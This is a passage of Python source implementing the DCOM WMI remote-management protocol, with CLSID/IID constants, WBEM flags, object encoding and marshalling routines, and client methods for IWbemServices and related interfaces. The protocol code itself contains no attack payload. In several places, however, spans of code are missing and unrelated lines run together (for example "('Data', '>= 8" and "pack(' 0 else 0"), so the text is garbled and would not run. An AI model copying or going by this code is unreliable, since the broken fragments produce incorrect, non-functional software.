First off, do we have a class?\n if (self['ObjectFlags'] & CIM_CLASS) == 0:\n # instance\n ctCurrent = self['InstanceType']['CurrentClass']\n currentName = ctCurrent.getClassName()\n if currentName is not None:\n self.printClass(ctCurrent, self['InstanceType'])\n return\n else: \n ctParent = self['ClassType']['ParentClass']\n ctCurrent = self['ClassType']['CurrentClass']\n\n parentName = ctParent.getClassName()\n if parentName is not None:\n self.printClass(ctParent)\n\n currentName = ctCurrent.getClassName()\n if currentName is not None:\n self.printClass(ctCurrent)\n\n# 2.2.70 MethodSignatureBlock\nclass METHOD_SIGNATURE_BLOCK(Structure):\n commonHdr = (\n ('EncodingLength', ENCODING_LENGTH),\n )\n tail = (\n ('_ObjectBlock', '_-ObjectBlock', 'self[\"EncodingLength\"]'),\n ('ObjectBlock', ':', OBJECT_BLOCK),\n )\n def __init__(self, data = None, alignment = 0):\n Structure.__init__(self, data, alignment)\n if data is not None:\n self.fromString(data)\n if self['EncodingLength'] > 0:\n self.structure = ()\n self.structure += self.tail\n self.fromString(data)\n else:\n self.data = None\n\n# 2.2.1 EncodingUnit\nclass ENCODING_UNIT(Structure):\n structure = (\n ('Signature', SIGNATURE),\n ('ObjectEncodingLength', OBJECT_ENCODING_LENGTH),\n ('_ObjectBlock', '_-ObjectBlock', 'self[\"ObjectEncodingLength\"]'),\n ('ObjectBlock', ':', OBJECT_BLOCK),\n )\n\n################################################################################\n# CONSTANTS\n################################################################################\n# 1.9 Standards Assignments\nCLSID_WbemLevel1Login = string_to_bin('8BC3F05E-D86B-11D0-A075-00C04FB68820')\nCLSID_WbemBackupRestore = string_to_bin('C49E32C6-BC8B-11D2-85D4-00105A1F8304')\nCLSID_WbemClassObject = string_to_bin('4590F812-1D3A-11D0-891F-00AA004B2E24')\n\nIID_IWbemLevel1Login = uuidtup_to_bin(('F309AD18-D86A-11d0-A075-00C04FB68820', '0.0'))\nIID_IWbemLoginClientID = uuidtup_to_bin(('d4781cd6-e5d3-44df-ad94-930efe48a887', '0.0'))\nIID_IWbemLoginHelper = uuidtup_to_bin(('541679AB-2E5F-11d3-B34E-00104BCC4B4A', '0.0'))\nIID_IWbemServices = uuidtup_to_bin(('9556DC99-828C-11CF-A37E-00AA003240C7', '0.0'))\nIID_IWbemBackupRestore = uuidtup_to_bin(('C49E32C7-BC8B-11d2-85D4-00105A1F8304', '0.0'))\nIID_IWbemBackupRestoreEx = uuidtup_to_bin(('A359DEC5-E813-4834-8A2A-BA7F1D777D76', '0.0'))\nIID_IWbemClassObject = uuidtup_to_bin(('DC12A681-737F-11CF-884D-00AA004B2E24', '0.0'))\nIID_IWbemContext = uuidtup_to_bin(('44aca674-e8fc-11d0-a07c-00c04fb68820', '0.0'))\nIID_IEnumWbemClassObject = uuidtup_to_bin(('027947e1-d731-11ce-a357-000000000001', '0.0'))\nIID_IWbemCallResult = uuidtup_to_bin(('44aca675-e8fc-11d0-a07c-00c04fb68820', '0.0'))\nIID_IWbemFetchSmartEnum = uuidtup_to_bin(('1C1C45EE-4395-11d2-B60B-00104B703EFD', '0.0'))\nIID_IWbemWCOSmartEnum = uuidtup_to_bin(('423EC01E-2E35-11d2-B604-00104B703EFD', '0.0'))\n\nerror_status_t = ULONG\n\n# lFlags\nWBEM_FLAG_RETURN_WBEM_COMPLETE = 0x00000000\nWBEM_FLAG_UPDATE_ONLY = 0x00000001\nWBEM_FLAG_CREATE_ONLY = 0x00000002\nWBEM_FLAG_RETURN_IMMEDIATELY = 0x00000010\nWBEM_FLAG_UPDATE_SAFE_MODE = 0x00000020\nWBEM_FLAG_FORWARD_ONLY = 0x00000020\nWBEM_FLAG_NO_ERROR_OBJECT = 0x00000040\nWBEM_FLAG_UPDATE_FORCE_MODE = 0x00000040\nWBEM_FLAG_SEND_STATUS = 0x00000080\nWBEM_FLAG_ENSURE_LOCATABLE = 0x00000100\nWBEM_FLAG_DIRECT_READ = 0x00000200\nWBEM_MASK_RESERVED_FLAGS = 0x0001F000\nWBEM_FLAG_USE_AMENDED_QUALIFIERS = 0x00020000\nWBEM_FLAG_STRONG_VALIDATION = 0x00100000\nWBEM_FLAG_BACKUP_RESTORE_FORCE_SHUTDOWN = 0x00000001\n\nWBEM_INFINITE = 0xffffffff\n\n################################################################################\n# STRUCTURES\n################################################################################\nclass UCHAR_ARRAY_CV(NDRUniConformantVaryingArray):\n item = 'c'\n\nclass PUCHAR_ARRAY_CV(NDRPOINTER):\n referent = (\n ('Data', UCHAR_ARRAY_CV),\n )\n\nclass PMInterfacePointer_ARRAY_CV(NDRUniConformantVaryingArray):\n item = PMInterfacePointer\n\nREFGUID = PGUID\n\nclass ULONG_ARRAY(NDRUniConformantArray):\n item = ULONG\n\nclass PULONG_ARRAY(NDRPOINTER):\n referent = (\n ('Data', ULONG_ARRAY),\n )\n\n# 2.2.5 WBEM_CHANGE_FLAG_TYPE Enumeration\nclass WBEM_CHANGE_FLAG_TYPE(NDRENUM):\n # [v1_enum] type\n structure = (\n ('Data', '>= 8\n\n # Now let's update the structure\n objRef = self.get_objRef()\n objRef = OBJREF_CUSTOM(objRef)\n encodingUnit = ENCODING_UNIT(objRef['pObjectData'])\n\n currentClass = encodingUnit['ObjectBlock']['InstanceType']['CurrentClass']\n encodingUnit['ObjectBlock']['InstanceType']['CurrentClass'] = b''\n\n encodingUnit['ObjectBlock']['InstanceType']['NdTable_ValueTable'] = packedNdTable + valueTable\n encodingUnit['ObjectBlock']['InstanceType']['InstanceHeap']['HeapLength'] = len(instanceHeap) | 0x80000000\n encodingUnit['ObjectBlock']['InstanceType']['InstanceHeap']['HeapItem'] = instanceHeap\n\n encodingUnit['ObjectBlock']['InstanceType']['EncodingLength'] = len(encodingUnit['ObjectBlock']['InstanceType'])\n encodingUnit['ObjectBlock']['InstanceType']['CurrentClass'] = currentClass\n\n encodingUnit['ObjectEncodingLength'] = len(encodingUnit['ObjectBlock'])\n objRef['pObjectData'] = encodingUnit\n\n else:\n\n objUnit = self.getObject()\n classPart = objUnit['ClassType']['CurrentClass']['ClassPart']\n cHeap = classPart['ClassHeap']['HeapItem']\n\n ### determine class name\n if self.__new_class_name:\n classPart['ClassHeader']['ClassNameRef'] = len(cHeap)\n className = ENCODED_STRING()\n className['Character'] = self.__new_class_name\n cHeap += className.getData()\n\n ### preserve existing properties\n existingPropCount = classPart['PropertyLookupTable']['PropertyCount']\n if existingPropCount > 0:\n existingNdTableLen = (existingPropCount - 1) // 4 + 1\n else:\n existingNdTableLen = 0\n existingNdTableBytes = classPart['NdTable_ValueTable'][:existingNdTableLen]\n existingValueTable = classPart['NdTable_ValueTable'][existingNdTableLen:]\n\n # Reconstruct existing ndTable as integer\n ndTable = 0\n for j in range(len(existingNdTableBytes)):\n ndTable |= existingNdTableBytes[j] << (8 * j)\n\n valueTable = existingValueTable\n\n ### add new properties\n classPart['PropertyLookupTable']['PropertyCount'] += len(self.__new_attributes)\n\n sorted_attrs = sorted(self.__new_attributes, key=lambda x:x[0])\n for i, attr in enumerate(sorted_attrs):\n attribute_name, attribute_type, attribute_default_value = attr\n propIndex = existingPropCount + i\n\n # property name\n classPart['PropertyLookupTable']['PropertyLookup'] += pack(PROPERTY_NAME_REF[:-2], len(cHeap))\n attrName = ENCODED_STRING()\n attrName['Character'] = attribute_name\n cHeap += attrName.getData()\n\n # property info\n classPart['PropertyLookupTable']['PropertyLookup'] += pack(PROPERTY_INFO_REF[:-2], len(cHeap))\n propertyInfo = PROPERTY_INFO()\n propertyInfo['PropertyType'] = attribute_type.value\n propertyInfo['DeclarationOrder'] = propIndex\n propertyInfo['ValueTableOffset'] = len(valueTable)\n propertyInfo['ClassOfOrigin'] = 0 # TODO\n qualifierSet, cimType = self.__createCimTypeQualifierSet(cHeap, propertyInfo)\n propertyInfo['PropertyQualifierSet'] = qualifierSet\n cHeap += propertyInfo.getData()\n cHeap += cimType.getData()\n\n curHeapPtr = len(cHeap)\n\n # property value\n pType = attribute_type.value & (~(CIM_ARRAY_FLAG|Inherited))\n itemValue = attribute_default_value\n propIsInherited = attribute_type.value & Inherited\n if attribute_type.value & CIM_ARRAY_FLAG:\n # Not yet ready\n packStr = HEAPREF[:-2]\n else:\n packStr = CIM_TYPES_REF[pType][:-2]\n\n if attribute_type.value & CIM_ARRAY_FLAG:\n if itemValue is None:\n ndTable |= self.__ndEntry(propIndex, True, propIsInherited)\n valueTable += pack(packStr, 0)\n else:\n valueTable += pack(' 0 else 0\n packedNdTable = b''\n for i in range(ndTableLen):\n packedNdTable += pack('B', ndTable & 0xff)\n ndTable >>= 8\n\n classPart['ClassHeader']['NdTableValueTableLength'] = len(packedNdTable + valueTable)\n classPart['NdTable_ValueTable'] = packedNdTable + valueTable\n # classPart['_NdTable_ValueTable'] = len(classPart['NdTable_ValueTable'])\n\n classPart['ClassHeader']['EncodingLength'] = len(classPart)\n objUnit['ClassType']['CurrentClass']['ClassPart'] = classPart\n\n self.encodingUnit['ObjectEncodingLength'] = len(objUnit)\n # self.encodingUnit['_ObjectBlock'] = len(objUnit)\n self.encodingUnit['ObjectBlock'] = objUnit\n # self.encodingUnit.dump()\n\n objRef = self.get_objRef()\n objRef = OBJREF_CUSTOM(objRef)\n objRef['pObjectData'] = self.encodingUnit\n\n return objRef\n\n def SpawnInstance(self):\n # Doing something similar to:\n # https://docs.microsoft.com/windows/desktop/api/wbemcli/nf-wbemcli-iwbemclassobject-spawninstance\n #\n if self.encodingUnit['ObjectBlock'].isInstance() is False:\n # We need to convert some things to transform a class into an instance\n encodingUnit = ENCODING_UNIT()\n\n instanceData = OBJECT_BLOCK()\n instanceData.structure += OBJECT_BLOCK.decoration\n instanceData.structure += OBJECT_BLOCK.instanceType\n instanceData['ObjectFlags'] = CIM_INSTANCE | CIM_DECORATION\n instanceData['Decoration'] = self.encodingUnit['ObjectBlock']['Decoration'].getData()\n\n instanceType = INSTANCE_TYPE()\n instanceType['CurrentClass'] = b''\n\n # Let's create the heap for the parameters\n instanceHeap = b''\n valueTable = b''\n parametersClass = ENCODED_STRING()\n parametersClass['Character'] = self.getClassName()\n instanceHeap += parametersClass.getData()\n curHeapPtr = len(instanceHeap)\n\n ndTable = 0\n properties = self.getProperties()\n\n # Let's initialize the values\n for i, propName in enumerate(properties):\n propRecord = properties[propName]\n\n pType = propRecord['type'] & (~(CIM_ARRAY_FLAG|Inherited)) \n if propRecord['type'] & CIM_ARRAY_FLAG:\n # Not yet ready\n #print paramDefinition\n #raise\n packStr = HEAPREF[:-2]\n else:\n packStr = CIM_TYPES_REF[pType][:-2]\n\n if propRecord['type'] & CIM_ARRAY_FLAG:\n valueTable += pack(packStr, 0)\n elif pType not in (CIM_TYPE_ENUM.CIM_TYPE_STRING.value, CIM_TYPE_ENUM.CIM_TYPE_DATETIME.value,\n CIM_TYPE_ENUM.CIM_TYPE_REFERENCE.value, CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value):\n valueTable += pack(packStr, 0)\n elif pType == CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value:\n # For now we just pack None and set the inherited_default\n # flag, just in case a parent class defines this for us\n valueTable += NULL.getData()\n ndTable |= self.__ndEntry(i, True, True)\n else:\n strIn = ENCODED_STRING()\n strIn['Character'] = ''\n valueTable += pack('>= 8\n\n instanceType['NdTable_ValueTable'] = packedNdTable + valueTable\n\n instanceType['InstanceQualifierSet'] = b'\\x04\\x00\\x00\\x00\\x01'\n\n instanceType['InstanceHeap'] = HEAP()\n instanceType['InstanceHeap']['HeapItem'] = instanceHeap\n instanceType['InstanceHeap']['HeapLength'] = len(instanceHeap) | 0x80000000\n instanceType['EncodingLength'] = len(instanceType)\n\n instanceType['CurrentClass'] = self.encodingUnit['ObjectBlock']['ClassType']['CurrentClass']['ClassPart']\n instanceData['InstanceType'] = instanceType.getData()\n\n encodingUnit['ObjectBlock'] = instanceData\n encodingUnit['ObjectEncodingLength'] = len(instanceData)\n\n #ENCODING_UNIT(str(encodingUnit)).dump()\n\n objRefCustomIn = OBJREF_CUSTOM()\n objRefCustomIn['iid'] = self._iid\n objRefCustomIn['clsid'] = CLSID_WbemClassObject\n objRefCustomIn['cbExtension'] = 0\n objRefCustomIn['ObjectReferenceSize'] = len(encodingUnit)\n objRefCustomIn['pObjectData'] = encodingUnit\n\n # There's gotta be a better way to do this\n # I will reimplement this stuff once I know it works\n import copy\n newObj = copy.deepcopy(self)\n newObj.set_objRef(objRefCustomIn.getData())\n newObj.process_interface(objRefCustomIn.getData())\n newObj.encodingUnit = ENCODING_UNIT(encodingUnit.getData())\n newObj.parseObject()\n if newObj.encodingUnit['ObjectBlock'].isInstance() is False:\n newObj.createMethods(newObj.getClassName(), newObj.getMethods())\n else:\n newObj.createProperties(newObj.getProperties())\n\n return newObj\n else:\n return self\n\n def createProperties(self, properties):\n for property in properties:\n # Do we have an object property?\n cimType = properties[property]['type'] & (~Inherited)\n if cimType == CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value and properties[property]['value'] != None:\n # Yes.. let's create an Object for it too\n objRef = OBJREF_CUSTOM()\n objRef['iid'] = self._iid\n objRef['clsid'] = CLSID_WbemClassObject\n objRef['cbExtension'] = 0\n objRef['ObjectReferenceSize'] = len(properties[property]['value'].getData())\n objRef['pObjectData'] = properties[property]['value']\n value = IWbemClassObject( INTERFACE(self.get_cinstance(), objRef.getData(), self.get_ipidRemUnknown(),\n oxid=self.get_oxid(), target=self.get_target()))\n elif cimType == CIM_TYPE_ENUM.CIM_ARRAY_OBJECT.value:\n if isinstance(properties[property]['value'], list):\n value = list()\n for item in properties[property]['value']:\n # Yes.. let's create an Object for it too\n objRef = OBJREF_CUSTOM()\n objRef['iid'] = self._iid\n objRef['clsid'] = CLSID_WbemClassObject\n objRef['cbExtension'] = 0\n objRef['ObjectReferenceSize'] = len(item.getData())\n objRef['pObjectData'] = item\n wbemClass = IWbemClassObject(\n INTERFACE(self.get_cinstance(), objRef.getData(), self.get_ipidRemUnknown(),\n oxid=self.get_oxid(), target=self.get_target()))\n value.append(wbemClass)\n else:\n value = properties[property]['value']\n else:\n value = properties[property]['value']\n setattr(self, property, value)\n\n def createMethods(self, classOrInstance, methods):\n class FunctionPool:\n def __init__(self,function):\n self.function = function\n def __getitem__(self,item):\n return partial(self.function,item)\n\n @FunctionPool\n def innerMethod(staticArgs, *args):\n classOrInstance = staticArgs[0] \n methodDefinition = staticArgs[1] \n if methodDefinition['InParams'] is not None:\n if len(args) != len(methodDefinition['InParams']):\n LOG.error(\"Function called with %d parameters instead of %d!\" % (len(args), len(methodDefinition['InParams'])))\n return None\n # In Params\n encodingUnit = ENCODING_UNIT()\n\n inParams = OBJECT_BLOCK()\n inParams.structure += OBJECT_BLOCK.instanceType\n inParams['ObjectFlags'] = CIM_INSTANCE\n inParams['Decoration'] = b''\n\n instanceType = INSTANCE_TYPE()\n instanceType['CurrentClass'] = b''\n instanceType['InstanceQualifierSet'] = b'\\x04\\x00\\x00\\x00\\x01'\n\n # Let's create the heap for the parameters\n instanceHeap = b''\n valueTable = b''\n parametersClass = ENCODED_STRING()\n parametersClass['Character'] = '__PARAMETERS'\n instanceHeap += parametersClass.getData()\n curHeapPtr = len(instanceHeap)\n\n ndTable = 0\n for i in range(len(args)):\n paramDefinition = list(methodDefinition['InParams'].values())[i]\n inArg = args[i]\n\n pType = paramDefinition['type'] & (~(CIM_ARRAY_FLAG|Inherited)) \n if paramDefinition['type'] & CIM_ARRAY_FLAG:\n # Not yet ready\n #print paramDefinition\n #raise\n packStr = HEAPREF[:-2]\n else:\n packStr = CIM_TYPES_REF[pType][:-2]\n\n if paramDefinition['type'] & CIM_ARRAY_FLAG:\n if inArg is None:\n valueTable += pack(packStr, 0)\n elif pType in (CIM_TYPE_ENUM.CIM_TYPE_STRING.value, CIM_TYPE_ENUM.CIM_TYPE_DATETIME.value,\n CIM_TYPE_ENUM.CIM_TYPE_REFERENCE.value, CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value):\n arraySize = pack(HEAPREF[:-2], len(inArg))\n arrayItems = []\n for j in range(len(inArg)):\n curVal = inArg[j]\n if pType == CIM_TYPE_ENUM.CIM_TYPE_OBJECT.value:\n curObject = b''\n marshaledObject = curVal.marshalMe()\n curObject += pack('>= 8\n\n instanceType['NdTable_ValueTable'] = packedNdTable + valueTable\n heapRecord = HEAP()\n heapRecord['HeapLength'] = len(instanceHeap) | 0x80000000\n heapRecord['HeapItem'] = instanceHeap\n \n instanceType['InstanceHeap'] = heapRecord\n\n instanceType['EncodingLength'] = len(instanceType)\n inMethods = methodDefinition['InParamsRaw']['ClassType']['CurrentClass']['ClassPart']\n inMethods['ClassHeader']['EncodingLength'] = len(\n methodDefinition['InParamsRaw']['ClassType']['CurrentClass']['ClassPart'].getData())\n instanceType['CurrentClass'] = inMethods\n\n inParams['InstanceType'] = instanceType.getData()\n\n encodingUnit['ObjectBlock'] = inParams\n encodingUnit['ObjectEncodingLength'] = len(inParams)\n\n objRefCustomIn = OBJREF_CUSTOM()\n objRefCustomIn['iid'] = self._iid\n objRefCustomIn['clsid'] = CLSID_WbemClassObject\n objRefCustomIn['cbExtension'] = 0\n objRefCustomIn['ObjectReferenceSize'] = len(encodingUnit)\n objRefCustomIn['pObjectData'] = encodingUnit\n else:\n objRefCustomIn = NULL\n\n ### OutParams\n encodingUnit = ENCODING_UNIT()\n\n outParams = OBJECT_BLOCK()\n outParams.structure += OBJECT_BLOCK.instanceType\n outParams['ObjectFlags'] = CIM_CLASS\n outParams['Decoration'] = b''\n\n instanceType = INSTANCE_TYPE()\n instanceType['CurrentClass'] = b''\n instanceType['NdTable_ValueTable'] = b''\n instanceType['InstanceQualifierSet'] = b''\n instanceType['InstanceHeap'] = b''\n instanceType['EncodingLength'] = len(instanceType)\n instanceType['CurrentClass'] = methodDefinition['OutParamsRaw']['ClassType']['CurrentClass']['ClassPart'].getData()\n outParams['InstanceType'] = instanceType.getData()\n\n\n encodingUnit['ObjectBlock'] = outParams\n encodingUnit['ObjectEncodingLength'] = len(outParams)\n\n objRefCustom = OBJREF_CUSTOM()\n objRefCustom['iid'] = self._iid\n objRefCustom['clsid'] = CLSID_WbemClassObject\n objRefCustom['cbExtension'] = 0\n objRefCustom['ObjectReferenceSize'] = len(encodingUnit)\n objRefCustom['pObjectData'] = encodingUnit\n try:\n return self.__iWbemServices.ExecMethod(classOrInstance, methodDefinition['name'], pInParams = objRefCustomIn )\n #return self.__iWbemServices.ExecMethod('Win32_Process.Handle=\"436\"', methodDefinition['name'],\n # pInParams=objRefCustomIn).getObject().ctCurrent['properties']\n except Exception as e:\n if LOG.level == logging.DEBUG:\n import traceback\n traceback.print_exc()\n LOG.error(str(e))\n\n for methodName in methods:\n innerMethod.__name__ = methodName\n setattr(self,innerMethod.__name__,innerMethod[classOrInstance,methods[methodName]])\n #methods = self.encodingUnit['ObjectBlock']\n \n\nclass IWbemLoginClientID(IRemUnknown):\n def __init__(self, interface):\n IRemUnknown.__init__(self,interface)\n self._iid = IID_IWbemLoginClientID\n\n def SetClientInfo(self, wszClientMachine, lClientProcId = 1234):\n request = IWbemLoginClientID_SetClientInfo()\n request['wszClientMachine'] = checkNullString(wszClientMachine)\n request['lClientProcId'] = lClientProcId\n request['lReserved'] = 0\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return resp\n\nclass IWbemLoginHelper(IRemUnknown):\n def __init__(self, interface):\n IRemUnknown.__init__(self,interface)\n self._iid = IID_IWbemLoginHelper\n\n def SetEvent(self, sEventToSet):\n request = IWbemLoginHelper_SetEvent()\n request['sEventToSet'] = sEventToSet\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n\nclass IWbemWCOSmartEnum(IRemUnknown):\n def __init__(self, interface):\n IRemUnknown.__init__(self,interface)\n self._iid = IID_IWbemWCOSmartEnum\n\n def Next(self, proxyGUID, lTimeout, uCount):\n request = IWbemWCOSmartEnum_Next()\n request['proxyGUID'] = proxyGUID\n request['lTimeout'] = lTimeout\n request['uCount'] = uCount\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\nclass IWbemFetchSmartEnum(IRemUnknown):\n def __init__(self, interface):\n IRemUnknown.__init__(self,interface)\n self._iid = IID_IWbemFetchSmartEnum\n\n def GetSmartEnum(self, lTimeout):\n request = IWbemFetchSmartEnum_GetSmartEnum()\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\nclass IWbemCallResult(IRemUnknown):\n def __init__(self, interface):\n IRemUnknown.__init__(self,interface)\n self._iid = IID_IWbemCallResult\n\n def GetResultObject(self, lTimeout):\n request = IWbemCallResult_GetResultObject()\n request['lTimeout'] = lTimeout\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n def GetResultString(self, lTimeout):\n request = IWbemCallResult_GetResultString()\n request['lTimeout'] = lTimeout\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n def GetResultServices(self, lTimeout):\n request = IWbemCallResult_GetResultServices()\n request['lTimeout'] = lTimeout\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n def GetCallStatus(self, lTimeout):\n request = IWbemCallResult_GetCallStatus()\n request['lTimeout'] = lTimeout\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return resp['plStatus']\n\nclass IEnumWbemClassObject(IRemUnknown):\n def __init__(self, interface, iWbemServices = None):\n IRemUnknown.__init__(self,interface)\n self._iid = IID_IEnumWbemClassObject\n self.__iWbemServices = iWbemServices\n\n def Reset(self):\n request = IEnumWbemClassObject_Reset()\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n def Next(self, lTimeout, uCount):\n request = IEnumWbemClassObject_Next()\n request['lTimeout'] = lTimeout\n request['uCount'] = uCount\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n interfaces = list()\n for interface in resp['apObjects']:\n interfaces.append(IWbemClassObject(\n INTERFACE(self.get_cinstance(), b''.join(interface['abData']), self.get_ipidRemUnknown(),\n oxid=self.get_oxid(), target=self.get_target()), self.__iWbemServices))\n\n return interfaces\n\n def NextAsync(self, lTimeout, pSink):\n request = IEnumWbemClassObject_NextAsync()\n request['lTimeout'] = lTimeout\n request['pSink'] = pSink\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n def Clone(self):\n request = IEnumWbemClassObject_Clone()\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n def Skip(self, lTimeout, uCount):\n request = IEnumWbemClassObject_Skip()\n request['lTimeout'] = lTimeout\n request['uCount'] = uCount\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\nclass IWbemServices(IRemUnknown):\n def __init__(self, interface):\n IRemUnknown.__init__(self,interface)\n self._iid = IID_IWbemServices\n\n def OpenNamespace(self, strNamespace, lFlags=0, pCtx = NULL):\n request = IWbemServices_OpenNamespace()\n request['strNamespace']['asData'] = strNamespace\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n def CancelAsyncCall(self,IWbemObjectSink ):\n request = IWbemServices_CancelAsyncCall()\n request['IWbemObjectSink'] = IWbemObjectSink\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return resp['ErrorCode']\n\n def QueryObjectSink(self):\n request = IWbemServices_QueryObjectSink()\n request['lFlags'] = 0\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return INTERFACE(self.get_cinstance(), b''.join(resp['ppResponseHandler']['abData']), self.get_ipidRemUnknown(),\n target=self.get_target())\n\n def GetObject(self, strObjectPath, lFlags=0, pCtx=NULL):\n request = IWbemServices_GetObject()\n request['strObjectPath']['asData'] = strObjectPath\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n ppObject = IWbemClassObject(\n INTERFACE(self.get_cinstance(), b''.join(resp['ppObject']['abData']), self.get_ipidRemUnknown(),\n oxid=self.get_oxid(), target=self.get_target()), self)\n if resp['ppCallResult'] != NULL:\n ppcallResult = IWbemCallResult(\n INTERFACE(self.get_cinstance(), b''.join(resp['ppObject']['abData']), self.get_ipidRemUnknown(),\n target=self.get_target()))\n else:\n ppcallResult = NULL\n return ppObject, ppcallResult\n\n def GetObjectAsync(self, strNamespace, lFlags=0, pCtx = NULL):\n request = IWbemServices_GetObjectAsync()\n request['strObjectPath']['asData'] = checkNullString(strNamespace)\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n def PutClass(self, pObject, lFlags=0, pCtx=NULL):\n request = IWbemServices_PutClass()\n if pObject is NULL:\n request['pObject'] = pObject\n else:\n request['pObject']['ulCntData'] = len(pObject)\n request['pObject']['abData'] = list(pObject.getData())\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return IWbemCallResult(\n INTERFACE(self.get_cinstance(), b''.join(resp['ppCallResult']['abData']), self.get_ipidRemUnknown(),\n target=self.get_target()))\n\n def PutClassAsync(self, pObject, lFlags=0, pCtx=NULL):\n request = IWbemServices_PutClassAsync()\n if pObject is NULL:\n request['pObject'] = pObject\n else:\n request['pObject']['ulCntData'] = len(pObject)\n request['pObject']['abData'] = list(pObject.getData())\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n def DeleteClass(self, strClass, lFlags=0, pCtx=NULL):\n request = IWbemServices_DeleteClass()\n request['strClass']['asData'] = checkNullString(strClass)\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return IWbemCallResult(\n INTERFACE(self.get_cinstance(), b''.join(resp['ppCallResult']['abData']), self.get_ipidRemUnknown(),\n target=self.get_target()))\n\n def DeleteClassAsync(self, strClass, lFlags=0, pCtx=NULL):\n request = IWbemServices_DeleteClassAsync()\n request['strClass']['asData'] = checkNullString(strClass)\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n def CreateClassEnum(self, strSuperClass, lFlags=0, pCtx=NULL):\n request = IWbemServices_CreateClassEnum()\n request['strSuperClass']['asData'] = checkNullString(strSuperClass)\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n def CreateClassEnumAsync(self, strSuperClass, lFlags=0, pCtx=NULL):\n request = IWbemServices_CreateClassEnumAsync()\n request['strSuperClass']['asData'] = checkNullString(strSuperClass)\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n def PutInstance(self, pInst, lFlags=0, pCtx=NULL):\n request = IWbemServices_PutInstance()\n\n if pInst is NULL:\n request['pInst'] = pInst\n else:\n request['pInst']['ulCntData'] = len(pInst)\n request['pInst']['abData'] = list(pInst.getData())\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return IWbemCallResult(\n INTERFACE(self.get_cinstance(), b''.join(resp['ppCallResult']['abData']), self.get_ipidRemUnknown(),\n target=self.get_target()))\n\n def PutInstanceAsync(self, pInst, lFlags=0, pCtx=NULL):\n request = IWbemServices_PutInstanceAsync()\n request['pInst'] = pInst\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n def DeleteInstance(self, strObjectPath, lFlags=0, pCtx=NULL):\n request = IWbemServices_DeleteInstance()\n request['strObjectPath']['asData'] = checkNullString(strObjectPath)\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n return IWbemCallResult(\n INTERFACE(self.get_cinstance(), b''.join(resp['ppCallResult']['abData']), self.get_ipidRemUnknown(),\n target=self.get_target()))\n\n def DeleteInstanceAsync(self, strObjectPath, lFlags=0, pCtx=NULL):\n request = IWbemServices_DeleteInstanceAsync()\n request['strObjectPath']['asData'] = checkNullString(strObjectPath)\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n def CreateInstanceEnum(self, strSuperClass, lFlags=0, pCtx=NULL):\n request = IWbemServices_CreateInstanceEnum()\n request['strSuperClass']['asData'] = strSuperClass\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return IEnumWbemClassObject(\n INTERFACE(self.get_cinstance(), b''.join(resp['ppEnum']['abData']), self.get_ipidRemUnknown(),\n target=self.get_target()))\n\n def CreateInstanceEnumAsync(self, strSuperClass, lFlags=0, pCtx=NULL):\n request = IWbemServices_CreateInstanceEnumAsync()\n request['strSuperClass']['asData'] = checkNullString(strSuperClass)\n request['lFlags'] = lFlags\n request['pCtx'] = pCtx\n resp = self.request(request, iid = self._iid, uuid = self.get_iPid())\n resp.dump()\n return resp\n\n def ExecQuery(self, strQuery, lFlags=0, pCtx=NULL):\n request = IWbemServices_ExecQuery()\n request['strQueryLanguage']['asData'] = checkNullString('WQL')\n request['strQuery']['asData'] = checkNullString(strQuery)\n 